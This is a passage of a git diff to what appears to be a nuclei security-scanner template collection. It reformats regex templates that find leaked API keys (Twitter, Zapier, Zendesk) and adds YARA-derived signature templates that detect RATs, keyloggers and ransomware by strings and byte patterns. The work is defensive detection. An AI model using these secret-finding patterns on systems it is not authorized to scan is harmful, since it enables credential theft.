"(?i)twilio(.{0,20})?SK[0-9a-f]{32}" + +# digest: 4b0a00483046022100de47f62e4aba3b07360714c3650501e642d180616b8fadb9c6af82114a17dcbe022100838e8bb6b140938d0a973f78addd50f15927ce43b471f402373a3a8676b4f889:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/twitter-secret.yaml b/file/keys/twitter-secret.yaml index 79c3de94bc..0a89da00fa 100644 --- a/file/keys/twitter-secret.yaml +++ b/file/keys/twitter-secret.yaml @@ -5,7 +5,6 @@ info: author: gaurang,daffainfo severity: medium tags: token,file,twitter - file: - extensions: - all @@ -14,4 +13,6 @@ file: - type: regex regex: - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" - - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" \ No newline at end of file + - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" + +# digest: 4a0a00473045022100d0efec25fa4880fa1dcfdbb4303fc8bfeaddf4e62c15395ce9d0443c2d773e9702202bbf2fbd6b1be33572a5fa33d3a51876ae77d10a60a6474ff61bde7f6cdd3498:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/zapier-webhook.yaml b/file/keys/zapier-webhook.yaml index 1959f5574a..137e5dbe48 100644 --- a/file/keys/zapier-webhook.yaml +++ b/file/keys/zapier-webhook.yaml @@ -8,7 +8,6 @@ info: - https://github.com/streaak/keyhacks#Zapier-Webhook-Token - https://docs.gitguardian.com/secrets-detection/detectors/specifics/zapier_webhook_url tags: token,file,zapier - file: - extensions: - all @@ -17,3 +16,5 @@ file: - type: regex regex: - 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/' + +# digest: 4b0a00483046022100eed256db2101d3638f5730f7a95a8c54b459814fdb5ada98a95f2508d9de3070022100dc508f4afe499ab2c64d2b9b4b59e44b479509937c7f1088efcc520c84318d6e:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/zendesk-secret-key.yaml b/file/keys/zendesk-secret-key.yaml new file mode 100644 index 0000000000..f80209ba68 --- /dev/null +++ b/file/keys/zendesk-secret-key.yaml @@ -0,0 +1,23 @@ +id: zendesk-secret-key + +info: + name: Zendesk Secret Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go + metadata: + verified: true + tags: zendesk,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:zendesk)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100ee6bae1cf90faa1beeae922204d58b2300e6ca7bf92065cb8a8402c597a1739002202c8bb2ae82d2e6c109dce0cce6fcb9d17f9f2977b098e1710dbdb8aafd92b8cd:922c64590222798bb761d5b6d8e72950 diff --git a/file/logs/django-framework-exceptions.yaml b/file/logs/django-framework-exceptions.yaml index 7578e833b1..df145de67e 100644 --- a/file/logs/django-framework-exceptions.yaml +++ b/file/logs/django-framework-exceptions.yaml @@ -9,7 +9,6 @@ info: - https://docs.djangoproject.com/en/1.11/ref/exceptions/ - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security tags: file,logs,django - file: - extensions: - all @@ -31,3 +30,5 @@ file: - 'SuspiciousSession' - 'TooManyFieldsSent' - 'PermissionDenied' + +# digest: 4a0a0047304502205f33a921687fc710f1271b09e50c6f9fbca2ca07919f6239a8972da5e80e4ece022100bfc39ac2cdb85b270eb0d92321b0809a68df57f8956a06dcaf6ac4a1e4b87e2f:922c64590222798bb761d5b6d8e72950 diff --git a/file/logs/python-app-sql-exceptions.yaml b/file/logs/python-app-sql-exceptions.yaml index 11f0523665..f8d05068fd 100644 --- a/file/logs/python-app-sql-exceptions.yaml +++ b/file/logs/python-app-sql-exceptions.yaml @@ -9,7 +9,6 @@ info: - https://www.python.org/dev - https://peps.python.org/pep-0249/ tags: file,logs,python,sql - file: - extensions: - all @@ -24,4 +23,4 @@ file: - 'ProgrammingError' - 'OperationalError' -# Enhanced by mp on 2022/10/05 +# digest: 4a0a00473045022079a46e42dc0321daff4fa00b021a299f5f746c2faed50fcba78acb826f35b261022100e777c196aed8119194c365ea967487c6795b47902f0d29873ade5a16fc1125cd:922c64590222798bb761d5b6d8e72950 diff --git a/file/logs/ruby-on-rails-framework-exceptions.yaml b/file/logs/ruby-on-rails-framework-exceptions.yaml index 02ebcb753f..e261af4c6d 100644 --- a/file/logs/ruby-on-rails-framework-exceptions.yaml +++ b/file/logs/ruby-on-rails-framework-exceptions.yaml @@ -11,7 +11,6 @@ info: - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception - https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb tags: file,logs,ruby,rails - file: - extensions: - all @@ -26,3 +25,5 @@ file: - 'ActionController::MethodNotAllowed' - 'ActionController::BadRequest' - 'ActionController::ParameterMissing' + +# digest: 4b0a00483046022100a1bd834e4286e12eca1f7399ab94cbe5050b0f8952abf7b30c664b22697e4df2022100a86690ed53bb1a4ac2537909bd5efb6ba95efb245ba9b746044f7bf4c958b2a5:922c64590222798bb761d5b6d8e72950 diff --git a/file/logs/spring-framework-exceptions.yaml b/file/logs/spring-framework-exceptions.yaml index feea077d23..158ed64bd6 100644 --- a/file/logs/spring-framework-exceptions.yaml +++ b/file/logs/spring-framework-exceptions.yaml @@ -8,7 +8,6 @@ info: reference: - https://docs.spring.io/spring-security/site/docs/current/apidocs/overview-tree.html tags: file,logs,spring - file: - extensions: - all @@ -25,3 +24,5 @@ file: - 'CookieTheftException' - 'InvalidCookieException' - 'RequestRejectedException' + +# digest: 4a0a0047304502206ba4ce83107c5c02e084ca1a2743a346e3e41dbc727e3470f6519aa3e24fc9950221009c39b68664e85289134c1c58072a5086f3878c01ec27503b82984401a1d9ac0c:922c64590222798bb761d5b6d8e72950 diff --git a/file/logs/suspicious-sql-error-messages.yaml b/file/logs/suspicious-sql-error-messages.yaml index 11113cba6b..b39028c9c6 100644 --- a/file/logs/suspicious-sql-error-messages.yaml +++ b/file/logs/suspicious-sql-error-messages.yaml @@ -10,7 +10,6 @@ info: cvss-score: 9.8 cwe-id: CWE-89 tags: file,logs,sql,error - file: - extensions: - all @@ -41,4 +40,4 @@ file: - 'near \"\*\"\: syntax error' - 'SELECTs to the left and right of UNION do not have the same number of result columns' -# Enhanced by mp on 2022/10/12 +# digest: 490a0046304402201d5d530c0efe89b2780c5a407266a640c4f3ddc7ccf1c39f27855bb9675b456e022031ffc06367293118a8f9c8e3ce0c116256961abbea5b0761b4954f7070fa6349:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/aar-malware.yaml b/file/malware/aar-malware.yaml new file mode 100644 index 0000000000..c006b686ac --- /dev/null +++ b/file/malware/aar-malware.yaml @@ -0,0 +1,25 @@ +id: aar-malware + +info: + name: AAR Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "Hashtable" + - "get_IsDisposed" + - "TripleDES" + - "testmemory.FRMMain.resources" + - "$this.Icon" + - "{11111-22222-20001-00001}" + - "@@@@@" + condition: and + +# digest: 4b0a00483046022100c3a9a57d91e28a49a5e9b6b0d1cb748be88c636110c9eb9482a51fde9f35266d022100a6f13bde1916d01e42c6dca9544ffdb9fe475e393657f82d753701898621b765:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/adzok-malware.yaml b/file/malware/adzok-malware.yaml new file mode 100644 index 0000000000..2308b74df5 --- /dev/null +++ b/file/malware/adzok-malware.yaml @@ -0,0 +1,111 @@ +id: adzok-malware + +info: + name: Adzok Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Adzok.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "Uninstall.jarPK" + - "resources/icono.pngPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "Uninstall.jarPK" + condition: and + + - type: word + part: raw + words: + - "config.xmlPK" + - "key.classPK" + - "svd$1.classPK" + - "svd$2.classPK" + - "Mensaje.classPK" + - "inic$ShutdownHook.class" + - "resources/icono.pngPK" + condition: and + +# digest: 4a0a00473045022078baa991694a29ddb0910faad83bbe2d56a67739ab974b6a43eab7e494ae29b302210090fb44202dfbca4ef591b7d55b2c10ddcff8a47737a46de9491c838a7263be77:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/alfa-malware.yaml b/file/malware/alfa-malware.yaml new file mode 100644 index 0000000000..f04ebb7959 --- /dev/null +++ b/file/malware/alfa-malware.yaml @@ -0,0 +1,19 @@ +id: alfa-malware + +info: + name: Alfa Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "8B0C9781E1FFFF000081F919040000740F81F9" + - "220400007407423BD07CE2EB02" + condition: and + +# digest: 4a0a0047304502206fd1a4e1b8a904da814aa19c10249a96a98fa29233f922bab161e3b93d413a00022100a147f5f3a192423bda7f022ad0bb3dd91d1a8d321d9a6687c9da0ca35ce98476:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/alienspy-malware.yaml b/file/malware/alienspy-malware.yaml new file mode 100644 index 0000000000..5a35a25748 --- /dev/null +++ b/file/malware/alienspy-malware.yaml @@ -0,0 +1,25 @@ +id: alienspy-malware + +info: + name: AlienSpy Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "META-INF/MANIFEST.MF" + - "ePK" + - "kPK" + - "config.ini" + - "password.ini" + - "stub/stub.dll" + - "c.dat" + condition: and + +# digest: 4b0a0048304602210099bae7391b6cf2278da97789c2cb44af6ea6a4983b92016e59a3456fa593335f022100cbc010d1b5dff13672cb5c07314431e7f74d24f8bc0c2035185d3c08269a3be3:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/alina-malware.yaml b/file/malware/alina-malware.yaml new file mode 100644 index 0000000000..98a994dc65 --- /dev/null +++ b/file/malware/alina-malware.yaml @@ -0,0 +1,21 @@ +id: alina-malware + +info: + name: Alina Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Alina.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'Alina v1.0' + - 'POST' + - '1[0-2])[0-9]' + condition: and + +# digest: 4b0a00483046022100a267b4decff9664b60695730319caed7c613138a358e3697b3e1b0566b20872c022100cf3ac7fafc2bed1b5d599729fcde42a0ac732f400b015a260b1a493fe8e8c193:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/alpha-malware.yaml b/file/malware/alpha-malware.yaml new file mode 100644 index 0000000000..8e1c21699a --- /dev/null +++ b/file/malware/alpha-malware.yaml @@ -0,0 +1,17 @@ +id: alpha-malware + +info: + name: Alpha Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "520065006100640020004D0065002000280048006F00770020004400650063" + +# digest: 4a0a004730450221009b5e9aa41a25cb5d9482c691f43bb6f1711b5a6907c684034f43192929520cb20220085710f5e83b940ae1e8defff1687753b6525289356cf579f3108a1a10620b52:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/andromeda-malware.yaml b/file/malware/andromeda-malware.yaml new file mode 100644 index 0000000000..95fafe77ee --- /dev/null +++ b/file/malware/andromeda-malware.yaml @@ -0,0 +1,24 @@ +id: andromeda-malware + +info: + name: Andromeda Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Andromeda.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - 'hsk\\ehs\\dihviceh\\serhlsethntrohntcohurrehem\\chsyst' + + - type: binary + binary: + - "1C1C1D03494746" + +# digest: 490a0046304402201778cf53991884f7b29706930aec0f8acfce69528e080663a436bdba0b42546a0220636a9eee01a609195564a9f19c89721357a20d1b3460d1beeff7b33b961c74b0:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/ap0calypse-malware.yaml b/file/malware/ap0calypse-malware.yaml new file mode 100644 index 0000000000..c60918be29 --- /dev/null +++ b/file/malware/ap0calypse-malware.yaml @@ -0,0 +1,24 @@ +id: ap0calypse-malware + +info: + name: Ap0calypse Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "Ap0calypse" + - "Sifre" + - "MsgGoster" + - "Baslik" + - "Dosyalars" + - "Injecsiyon" + condition: and + +# digest: 4a0a004730450221009a4fe2a01a81f0ce6902dff99fd80899a03564015ef45e6a0cf97470115f32b3022027b355be70bb66fb654b7ea8d1cfc34de9d61102a4d5a66f8218b764b4d94897:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/arcom-malware.yaml b/file/malware/arcom-malware.yaml new file mode 100644 index 0000000000..8cc32d336f --- /dev/null +++ b/file/malware/arcom-malware.yaml @@ -0,0 +1,29 @@ +id: arcom-malware + +info: + name: Arcom Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "CVu3388fnek3W(3ij3fkp0930di" + - "ZINGAWI2" + - "clWebLightGoldenrodYellow" + - "Ancestor for '%s' not found" + - "Control-C hit" + condition: and + + - type: binary + binary: + - "A3242521" + +# digest: 4b0a00483046022100c94af5a498c4235c4290fd509d830c181e05b2915d979c951c297aacd1c24f71022100902af9cda3098593dc1e6f28001eecccd32330b65e6f6329d35bf7e48fb757ea:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/arkei-malware.yaml b/file/malware/arkei-malware.yaml new file mode 100644 index 0000000000..3d74fd6ab3 --- /dev/null +++ b/file/malware/arkei-malware.yaml @@ -0,0 +1,23 @@ +id: arkei-malware + +info: + name: Arkei Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Arkei.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'Arkei' + - '/server/gate' + - '/server/grubConfig' + - '\\files\\' + - 'SQLite' + condition: and + +# digest: 4a0a004730450220521d19ffdc72c12b2e9464f1214ef06c4d2b714414ed036d576636a2bfcb8455022100a6fcba94907d58d6ebf858c11440ccc232b30a950ddb1a3bed2eacebeac1e8e8:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/backoff-malware.yaml b/file/malware/backoff-malware.yaml new file mode 100644 index 0000000000..524f060a07 --- /dev/null +++ b/file/malware/backoff-malware.yaml @@ -0,0 +1,21 @@ +id: backoff-malware + +info: + name: Backoff Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Backoff.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - '&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s' + - '%s @ %s' + - 'Upload KeyLogs' + condition: and + +# digest: 490a00463044022054816145454972b2358433c84a6671c0caf54ba3365d6f959c77815a082223ce02206908e7c060293d4bfcb9349f78aa7e296b348d407d8098600fa1e839b273350a:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/bandook-malware.yaml b/file/malware/bandook-malware.yaml new file mode 100644 index 0000000000..f3026b592c --- /dev/null +++ b/file/malware/bandook-malware.yaml @@ -0,0 +1,28 @@ +id: bandook-malware + +info: + name: Bandook Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "aaaaaa1|" + - "aaaaaa2|" + - "aaaaaa3|" + - "aaaaaa4|" + - "aaaaaa5|" + - "%s%d.exe" + - "astalavista" + - "givemecache" + - "%s\\system32\\drivers\\blogs\\*" + - "bndk13me" + condition: and + +# digest: 490a00463044022007979ba459fa852d0b1fd07c059ee0adb0247b99212b122b9f3b6e1e4048588d02205a59508d1df975e27c8120cd265e4c11e535631c16b5be4ca71b9595c4326cc2:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/basicrat-malware.yaml b/file/malware/basicrat-malware.yaml new file mode 100644 index 0000000000..9a3d5aaf55 --- /dev/null +++ b/file/malware/basicrat-malware.yaml @@ -0,0 +1,23 @@ +id: basicrat-malware + +info: + name: BasicRAT Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/multi/malware_multi_vesche_basicrat.yara + tags: malware,file,basicrat +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "HKCU Run registry key applied" + - "HKCU Run registry key failed" + - "Error, platform unsupported." + - "Persistence successful," + - "Persistence unsuccessful," + condition: and + +# digest: 4a0a00473045022100a3b0720f39037b89cbbc1a8a155cbb1d582662a4fec913439bff2417eab3e603022017b43756edf65a2ecf81c6949c67a80b1ba8de85367ce236c003de0f6f8cfbae:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/blacknix-malware.yaml b/file/malware/blacknix-malware.yaml new file mode 100644 index 0000000000..df613d076f --- /dev/null +++ b/file/malware/blacknix-malware.yaml @@ -0,0 +1,23 @@ +id: blacknix-malware + +info: + name: BlackNix Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "SETTINGS" + - "Mark Adler" + - "Random-Number-Here" + - "RemoteShell" + - "SystemInfo" + condition: and + +# digest: 4b0a00483046022100d79b2bf6b9813e24be723eb40b017c34bbd91cae5b58e92d923f51257f56d1ed022100e978029b16a82c219c6186d41c114204721f08530e6a919c27b8a37475e29145:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/blackworm-malware.yaml b/file/malware/blackworm-malware.yaml new file mode 100644 index 0000000000..5ebd829ee4 --- /dev/null +++ b/file/malware/blackworm-malware.yaml @@ -0,0 +1,29 @@ +id: blackworm-malware + +info: + name: Blackworm Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_BlackWorm.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'm_ComputerObjectProvider' + - 'MyWebServices' + - 'get_ExecutablePath' + - 'get_WebServices' + - 'My.WebServices' + - 'My.User' + - 'm_UserObjectProvider' + - 'DelegateCallback' + - 'TargetMethod' + - '000004b0' + - 'Microsoft Corporation' + condition: and + +# digest: 4a0a004730450220321a9ba25d7190220dfe7a801636bec8dd82300a4da2c00042576a880fd29287022100db2c2eaa880379c8391de61e30836de4b1ac496040c28f59da587259b3c7f089:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/bluebanana-malware.yaml b/file/malware/bluebanana-malware.yaml new file mode 100644 index 0000000000..fb56a9c104 --- /dev/null +++ b/file/malware/bluebanana-malware.yaml @@ -0,0 +1,24 @@ +id: bluebanana-malware + +info: + name: BlueBanana Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "META-INF" + - "config.txt" + - "a/a/a/a/f.class" + - "a/a/a/a/l.class" + - "a/a/a/b/q.class" + - "a/a/a/b/v.class" + condition: and + +# digest: 4a0a00473045022100fff584f3f17159c1748a0e0d4d2b0ee120b206c7f959c4710c02215ae2aca93202206700d0cf20118e36c252a73fbf0f9d0f2bab421663c347de5e5764537c44d855:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/bozok-malware.yaml b/file/malware/bozok-malware.yaml new file mode 100644 index 0000000000..40c14a1f35 --- /dev/null +++ b/file/malware/bozok-malware.yaml @@ -0,0 +1,24 @@ +id: bozok-malware + +info: + name: Bozok Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Bozok.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "getVer" + - "StartVNC" + - "SendCamList" + - "untPlugin" + - "gethostbyname" + condition: and + case-insensitive: true + +# digest: 4b0a00483046022100f2c9bd8b2ea4e20d78f05da06c61f06d8e04b10d3278739034fdfda246502739022100cb09d1b5cf17a4e82f48f572ec3da680ce8f891a923d5735eca5b8becaca8fca:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/bublik-malware.yaml b/file/malware/bublik-malware.yaml new file mode 100644 index 0000000000..6819943d8a --- /dev/null +++ b/file/malware/bublik-malware.yaml @@ -0,0 +1,19 @@ +id: bublik-malware + +info: + name: Bublik Malware Detector + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Bublik.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - '636F6E736F6C6173' + - '636C556E00696E666F2E696E69' + condition: and + +# digest: 4a0a00473045022020ba9de3e2cb03c66cf8a47387eeece28ff22583c7f326a703492241b6828b39022100b1114876a5721a8c80ad0902b80cd0e21cb60edc9cdb30f1bdf4f4c6d87a6753:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/cap-hookexkeylogger-malware.yaml b/file/malware/cap-hookexkeylogger-malware.yaml new file mode 100644 index 0000000000..12ecb01378 --- /dev/null +++ b/file/malware/cap-hookexkeylogger-malware.yaml @@ -0,0 +1,39 @@ +id: cap-hookexkeylogger-malware + +info: + name: CAP HookExKeylogger Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_CAP_HookExKeylogger.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "SetWindowsHookEx" + - "WH_KEYBOARD_LL" + condition: and + case-insensitive: true + + - type: word + part: raw + words: + - "SetWindowsHookEx" + - "WH_KEYBOARD" + condition: and + case-insensitive: true + + - type: word + part: raw + words: + - "WH_KEYBOARD" + - "WH_KEYBOARD_LL" + condition: and + case-insensitive: true + +# digest: 490a0046304402200f26aeb3ca9df9f4045a64a911f4165e3d2cce3ecd67e137f3b2933a1ad58fdf02200afec8f59a9b9944c13e0480ccca71629e367d03dbe950f02440a6cf9f4a52cf:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/cerber-malware.yaml b/file/malware/cerber-malware.yaml new file mode 100644 index 0000000000..553e795216 --- /dev/null +++ b/file/malware/cerber-malware.yaml @@ -0,0 +1,21 @@ +id: cerber-malware + +info: + name: Cerber Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara + tags: malware,file,cerber +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "38oDr5.vbs" + - "8ivq.dll" + - "jmsctls_progress32" + condition: and + +# digest: 4a0a00473045022100875a7c6d4f7468c6d1b91a1eff6e5d17ddc8253fadf0856b37b4f8ced121f6fe0220184ef1cbe47ccffd9fd29895751c24db364027da486bbf48c8ddd86ce84e89e1:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/cerberus-malware.yaml b/file/malware/cerberus-malware.yaml new file mode 100644 index 0000000000..0b15fdd4d3 --- /dev/null +++ b/file/malware/cerberus-malware.yaml @@ -0,0 +1,29 @@ +id: cerberus-malware + +info: + name: Cerberus Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Cerberus.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "Ypmw1Syv023QZD" + - "wZ2pla" + - "wBmpf3Pb7RJe" + condition: or + + - type: word + part: raw + words: + - "cerberus" + case-insensitive: true + +# digest: 490a00463044022006c23cd80a8b9974883e26b0cfb251e5834a1340be09efe1c38d397f5ea1b9470220723d8425e377276fde160744c4191d1496a8ad12d48084235c96fc995c3deace:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/clientmesh-malware.yaml b/file/malware/clientmesh-malware.yaml new file mode 100644 index 0000000000..f72aa3a816 --- /dev/null +++ b/file/malware/clientmesh-malware.yaml @@ -0,0 +1,30 @@ +id: clientmesh-malware + +info: + name: ClientMesh Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "machinedetails" + - "MySettings" + - "sendftppasswords" + - "sendbrowserpasswords" + - "arma2keyMass" + - "keylogger" + condition: and + + - type: binary + binary: + - "0000000000000000007E" + +# digest: 4a0a00473045022100ad978f9cce613b41cec0b9bfcbccb89b8e5525ba0f9717e3b68b3c74a0a12588022005886883415cdd79b437a4df3a16fbc34eb2f5d9bc66b400274f379e44fa27c5:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/crimson-malware.yaml b/file/malware/crimson-malware.yaml new file mode 100644 index 0000000000..2e1faf51ae --- /dev/null +++ b/file/malware/crimson-malware.yaml @@ -0,0 +1,23 @@ +id: crimson-malware + +info: + name: Crimson Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Crimson.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "com/crimson/PK" + - "com/crimson/bootstrapJar/PK" + - "com/crimson/permaJarMulti/PermaJarReporter$1.classPK" + - "com/crimson/universal/containers/KeyloggerLog.classPK" + - "com/crimson/universal/UploadTransfer.classPK" + condition: and + +# digest: 4a0a0047304502201aca2f60909bc78a6b817e7ec9f4cc6729f9c7bdebd09dd2a06424bd2e0d9cf9022100a46b5beb11bcdb8be397a0022dd14160bd17e8a8467b600daefd1c205f271319:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/crunchrat-malware.yaml b/file/malware/crunchrat-malware.yaml new file mode 100644 index 0000000000..9e247bbbd4 --- /dev/null +++ b/file/malware/crunchrat-malware.yaml @@ -0,0 +1,28 @@ +id: crunchrat-malware + +info: + name: CrunchRAT Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara + tags: malware,file,crunchrat +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "command" + - "upload" + - "download" + - "cmd.exe" + - "application/x-www-form-urlencoded" + - "&action=" + - "&secondary=" + - "" + - "" + condition: and + case-insensitive: true + +# digest: 4a0a0047304502207f75542fcb07f843be7d316303c3dd5eaa2343dc52f018ffc21a16d11e7e7eed022100dba2448549754113fd319716df8f27825011101f6909f36aa8beed10abfe7e05:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/cryptxxx-dropper-malware.yaml b/file/malware/cryptxxx-dropper-malware.yaml new file mode 100644 index 0000000000..5e60e0183e --- /dev/null +++ b/file/malware/cryptxxx-dropper-malware.yaml @@ -0,0 +1,19 @@ +id: cryptxxx-dropper-malware + +info: + name: CryptXXX Dropper Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "50653157584346765962486F35" + - "43003A005C0042004900450052005C0051006D006B004E0052004C00460000" + condition: and + +# digest: 4a0a00473045022100bdc14952eb8408ad1757d3a386ecab4617d7f3e5d4287292e8018aced2e61ede022053c9b5781dafb7dfb014d0e0a018b99ce5e1515a4a8800c254094c90eb65c454:922c64590222798bb761d5b6d8e72950 diff --git 